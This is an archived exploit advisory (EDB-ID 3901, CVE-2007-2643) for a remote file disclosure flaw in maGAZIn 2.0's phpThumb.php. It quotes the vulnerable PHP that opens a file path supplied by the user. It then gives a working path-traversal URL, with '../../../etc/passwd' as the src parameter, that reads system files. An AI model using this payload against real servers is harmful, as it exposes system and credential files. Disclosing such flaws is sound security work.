maGAZIn 2.0 phpThumb.php src Remote File Disclosure Vulnerability

2007-05-11T00:00:00
ID EDB-ID:3901
Type exploitdb
Reporter Dj7xpl
Modified 2007-05-11T00:00:00

Description

maGAZIn 2.0 (phpThumb.php src) Remote File Disclosure Vulnerability. CVE-2007-2643. Webapps exploit for php platform

                                        
                                                    \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   Dj7xpl@yahoo.com   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

---------------------------------------------------------------------

[!] Portal   :   maGAZIn v2.0
[!] Download :   http://www.pinkcrow.net/Scripts/gallery.php
[!] Type     :   Remote File Disclosure Vulnerability

---------------------------------------------------------------------

---------------------------------------------------------------------

Vuln Code :  Line (152 - 157)

[Code]
if ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {
		$OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));
		fclose($fp);
	} else {
		ErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);
	}
[/Code]

---------------------------------------------------------------------

---------------------------------------------------------------------

Bug :

http://[Target]/[Path]/phpThumb.php?src=[Local File]

Example :

http://Target.ir/Gallery/phpThumb.php?src=../../../etc/passwd

---------------------------------------------------------------------

# milw0rm.com [2007-05-11]